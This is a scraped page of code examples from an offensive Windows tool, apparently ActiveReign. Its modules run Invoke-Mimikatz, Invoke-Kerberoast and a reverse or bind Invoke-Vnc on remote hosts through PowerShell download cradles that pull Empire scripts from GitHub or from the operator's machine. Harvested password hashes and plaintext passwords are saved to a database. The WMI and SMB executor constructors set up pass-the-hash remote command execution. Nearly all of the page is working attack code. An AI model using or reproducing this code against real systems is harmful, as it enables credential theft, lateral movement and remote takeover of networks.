コード例 #1
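    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Mimikatz on ``target`` and store any parsed credentials.

        The script is fetched by the target from the operator's own host when
        ``args.fileless`` is set, otherwise from the Empire raw GitHub URL;
        ``gen_ps_iex_cradle`` wraps that location and the ``COMMAND`` module
        argument into a download cradle which ``code_execution`` runs. Output is
        echoed under ``args.debug``, each credential yielded by
        ``self.parse_mimikatz`` is written to ``smb_con.db`` and the raw output
        is saved to a file in ``args.workspace``.

        Args:
            target: host label used in log lines and in the output file name.
            args: CLI namespace; reads ``timeout``, ``fileless``, ``force_ps32``,
                ``no_obfs``, ``debug`` and ``workspace``. ``timeout`` is raised
                for the duration of the call and restored before returning.
            smb_con: connection exposing ``host``, ``ip``, ``os`` and ``db``.
            loggers: mapping holding the ``'console'`` logger.
            config_obj: forwarded to ``code_execution`` unchanged.

        Returns:
            None. Failures are reported on the console logger; nothing
            propagates to the caller.
        """
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source
            # NOTE(review): neither location is integrity-checked (no hash or
            # pin); whatever the URL serves at run time is what gets executed.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                elif args.debug:
                    for line in results.splitlines():
                        loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                # Each cred is (kind, domain, user, secret); the log line prints
                # domain\user:secret. The update_user argument order is presumably
                # (user, password, domain, hash) -- verify against smb_con.db.
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])

            except Exception as e:
                # Matching on the exception text is brittle, but it is the only
                # signal parse_mimikatz gives when the output has no usable lines.
                if str(e) == "list index out of range":
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
                else:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # ``args`` is shared across modules and targets; undo the bump so it
            # does not accumulate on every run.
            setattr(args, 'timeout', timeout)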
コード例 #2
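    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Vnc on ``target`` in the mode selected by ``CONTYPE``.

        Builds the ``Invoke-Vnc`` command line from the ``CONTYPE``, ``IPADDRESS``,
        ``PORT`` and ``PASSWORD`` module arguments (``IPADDRESS`` defaults to the
        local address for ``reverse``), wraps it in an IEX download cradle for
        the script location and runs it through ``code_execution``. Lines of
        output are logged unless the execution helper reported a failure.

        Args:
            target: host label used by ``code_execution``.
            args: CLI namespace; reads ``timeout``, ``fileless``, ``force_ps32``
                and ``no_obfs``. ``timeout`` is raised for the duration of the
                call and restored before returning.
            smb_con: connection exposing ``host``, ``ip`` and ``os``.
            loggers: mapping holding the ``'console'`` logger.
            config_obj: forwarded to ``code_execution`` unchanged.

        Returns:
            None. An invalid ``CONTYPE`` is reported and the call returns instead
            of terminating the whole process.
        """
        cmd = ''
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
        try:
            # Define Script Source
            # NOTE(review): neither location is integrity-checked (no hash or
            # pin); whatever the URL serves at run time is what gets executed.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            if self.args['CONTYPE']['Value'] == 'reverse':
                if not self.args['IPADDRESS']['Value']:
                    self.args['IPADDRESS']['Value'] = get_local_ip()

                cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            elif self.args['CONTYPE']['Value'] == 'bind':
                cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            else:
                # Operator configuration error: report it as a failure and hand
                # control back to the caller. The previous exit(1) raised
                # SystemExit past the handler below and ended the whole run.
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
                return

            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output
            # code_execution may return an empty/None result; treat it like no output
            # rather than failing on .startswith.
            if x and not x.startswith('Code execution failed'):
                for line in x.splitlines():
                    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
            else:
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # ``args`` is shared across modules and targets; undo the bump so it
            # does not accumulate on every run.
            setattr(args, 'timeout', timeout)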
コード例 #3
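    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Kerberoast on ``target`` and save its output.

        Wraps the script location in an IEX download cradle with no extra
        arguments, runs it through ``code_execution``, logs every output line
        and writes the raw output to a file in ``args.workspace``.

        Args:
            target: host label used in log lines and in the output file name.
            args: CLI namespace; reads ``timeout``, ``fileless``, ``force_ps32``,
                ``no_obfs`` and ``workspace``. ``timeout`` is raised for the
                duration of the call and restored before returning.
            smb_con: connection exposing ``host``, ``ip`` and ``os``.
            loggers: mapping holding the ``'console'`` logger.
            config_obj: forwarded to ``code_execution`` unchanged.

        Returns:
            None. Failures are reported on the console logger; nothing
            propagates to the caller.
        """
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([
            smb_con.host, smb_con.ip,
            self.name.upper(), 'Attempting Invoke-Kerberoast'
        ])
        try:
            # Define Script Source
            # NOTE(review): neither location is integrity-checked (no hash or
            # pin); whatever the URL serves at run time is what gets executed.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
                    srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher,
                                               loggers['console'],
                                               force_ps32=args.force_ps32,
                                               no_obfs=args.no_obfs,
                                               server_os=smb_con.os)
            x = code_execution(smb_con,
                               args,
                               target,
                               loggers,
                               config_obj,
                               cmd,
                               return_data=True)

            # Display Output
            # An empty/None result would otherwise raise on .splitlines() and be
            # swallowed as a debug message; report it explicitly instead.
            if not x:
                loggers['console'].fail(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), 'No output returned'])
                return
            for line in x.splitlines():
                loggers['console'].success(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), line])

            # write results to file
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(x)
            loggers['console'].info([
                smb_con.host, smb_con.ip,
                self.name.upper(), "Output saved to: {}".format(file_name)
            ])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # ``args`` is shared across modules and targets; undo the bump so it
            # does not accumulate on every run.
            setattr(args, 'timeout', timeout)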
コード例 #4
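    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Mimikatz on ``target`` and store any parsed credentials.

        Older variant of the module: the script location and the ``COMMAND``
        module argument are wrapped into an IEX download cradle and run through
        ``code_execution``; every output line is logged and each credential
        yielded by ``self.parse_mimikatz`` is written to ``smb_con.db``.

        Args:
            target: host label used by ``code_execution``.
            args: CLI namespace; reads ``timeout``, ``fileless``, ``force_ps32``
                and ``obfs``. ``timeout`` is raised for the duration of the
                call and restored before returning.
            smb_con: connection exposing ``host``, ``ip``, ``os`` and ``db``.
            loggers: mapping holding the ``'console'`` logger.
            config_obj: forwarded to ``code_execution`` unchanged.

        Returns:
            None. Failures are reported on the console logger; nothing
            propagates to the caller.
        """
        logger = loggers['console']
        # Captured before the try so the finally below can always restore it.
        timeout = args.timeout
        try:
            # Get script:
            # NOTE(review): neither location is integrity-checked (no hash or
            # pin); whatever the URL serves at run time is what gets executed.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            logger.debug('Fetching script from {}'.format(script_location))

            # Setup
            setattr(args, 'timeout', timeout+10)       # Modify timeout to allow execution time
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
                x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
                # Display Output
                for line in x.splitlines():
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                # Each cred is (kind, domain, user, secret); the update_user argument
                # order is presumably (user, password, domain, hash) -- verify
                # against smb_con.db.
                db_updates = 0
                for cred in self.parse_mimikatz(x):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        db_updates += 1
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
            except Exception as e:
                loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # ``args`` is shared across modules and targets; undo the bump so it
            # does not accumulate on every run.
            setattr(args, 'timeout', timeout)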
コード例 #5
ファイル: wmiexec.py プロジェクト: rajivraj/ActiveReign
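    def __init__(self, logger, host, args, smb_con, share_name=''):
        """Store the connection settings for a WMI-based command executor.

        No network activity happens here; the constructor only copies values
        out of ``args`` and decides where command output will be collected.

        Args:
            logger: logger used by the executor.
            host: target host name or address.
            args: CLI namespace; reads ``debug``, ``domain``, ``user``, ``passwd``,
                ``hash``, ``no_output``, ``timeout``, ``exec_ip``, ``exec_share``
                and ``exec_path``.
            smb_con: existing SMB connection object, kept as ``self.smbcon``.
            share_name: when non-empty, output is collected "fileless" on a
                share of that name served from the local address; otherwise the
                ``exec_*`` settings from ``args`` are used.

        Raises:
            AttributeError: if ``args.hash`` is set but is not a string.
        """
        self.outfile    = gen_random_string()
        self.debug      = args.debug
        self.logger     = logger
        self.host       = host
        self.domain     = args.domain
        self.username   = args.user
        self.password   = args.passwd

        self.hash   = args.hash
        self.lmhash = ''
        self.nthash = ''


        self.pwd          = str('C:\\')
        self.shell        = 'cmd.exe /Q /c '
        self.noOutput     = args.no_output
        self.outputBuffer = ''

        self.timeout         = args.timeout
        self.smbcon          = smb_con
        self.fileless_output = False

        if share_name:
            # Fileless output
            self.fileless_output = True
            self.ip              = get_local_ip()
            self.share           = share_name
            self.path            = "\\"
        else:
            # Filed or Remote output
            self.ip     = args.exec_ip
            self.share  = args.exec_share
            self.path   = args.exec_path

        if self.hash:
            # Accept either "LM:NT" or a bare NT hash. Only the unpacking
            # mismatch is expected here; the bare except it replaces also
            # swallowed KeyboardInterrupt and genuine programming errors.
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except ValueError:
                self.nthash = self.hash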
コード例 #6
ファイル: smbexec.py プロジェクト: wizard2773/ActiveReign
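    def __init__(self, logger, host, args, smb_con, port=445, share_name=''):
        """Store executor settings and open the Service Control Manager over SMB.

        Unlike the WMI variant this constructor connects immediately: it builds
        an ``ncacn_np`` string binding to the ``svcctl`` pipe on ``host``, sets
        the supplied credentials on the transport, binds the DCE/RPC endpoint
        to the SCMR interface and keeps the opened SCM handle in
        ``self.__scHandle``.

        Args:
            logger: logger used by the executor.
            host: target host name or address.
            args: CLI namespace; reads ``user``, ``passwd``, ``domain``, ``hash``,
                ``timeout``, ``debug``, ``no_output``, ``exec_ip``, ``exec_share``
                and ``exec_path``.
            smb_con: existing SMB connection object, kept as ``self.smbcon``.
            port: SMB port handed to the RPC transport.
            share_name: when non-empty, output is collected "fileless" on a
                share of that name served from the local address; otherwise the
                ``exec_*`` settings from ``args`` are used.

        Raises:
            Whatever the RPC transport raises when the connection, bind or
            OpenSCManager call fails; nothing is caught here.
        """

        self.logger = logger
        self.outfile = gen_random_string()
        self.batchFile = gen_random_string() + '.bat'
        self.__serviceName = gen_random_string()
        self.__rpctransport = None
        self.__scmr = None
        self.__conn = None
        self.__output = None
        self.__shell = '%COMSPEC% /Q /c '
        # self.__mode       = mode
        # self.__aesKey     = aesKey
        # self.__doKerberos = doKerberos

        # Auth
        self.smbcon = smb_con
        self.host = host
        self.port = port
        self.username = args.user
        self.password = args.passwd
        self.domain = args.domain
        self.hash = args.hash
        self.lmhash = ''
        self.nthash = ''
        self.timeout = args.timeout

        self.debug = args.debug
        self.noOutput = args.no_output
        self.fileless_output = False

        if share_name:
            # Fileless output
            self.fileless_output = True
            self.ip = get_local_ip()
            self.share = share_name
            self.path = "\\"
        else:
            # Filed or Remote output
            self.ip = args.exec_ip
            self.share = args.exec_share
            self.path = args.exec_path

        if self.hash:
            # Accept either "LM:NT" or a bare NT hash. Only the unpacking
            # mismatch is expected here; the bare except it replaces also
            # swallowed KeyboardInterrupt and genuine programming errors.
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except ValueError:
                self.nthash = self.hash

        # Raw string: "\p" and "\s" are not valid escapes and newer Pythons warn
        # on them; the resulting value is unchanged.
        stringbinding = r'ncacn_np:{}[\pipe\svcctl]'.format(self.host)
        self.logger.debug('StringBinding {}'.format(stringbinding))
        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        self.__rpctransport.set_dport(self.port)

        if hasattr(self.__rpctransport, 'setRemoteHost'):
            self.__rpctransport.setRemoteHost(self.host)
        if hasattr(self.__rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            self.__rpctransport.set_credentials(self.username, self.password,
                                                self.domain, self.lmhash,
                                                self.nthash)
        #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)

        self.__scmr = self.__rpctransport.get_dce_rpc()
        self.__scmr.connect()
        s = self.__rpctransport.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(self.timeout)

        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']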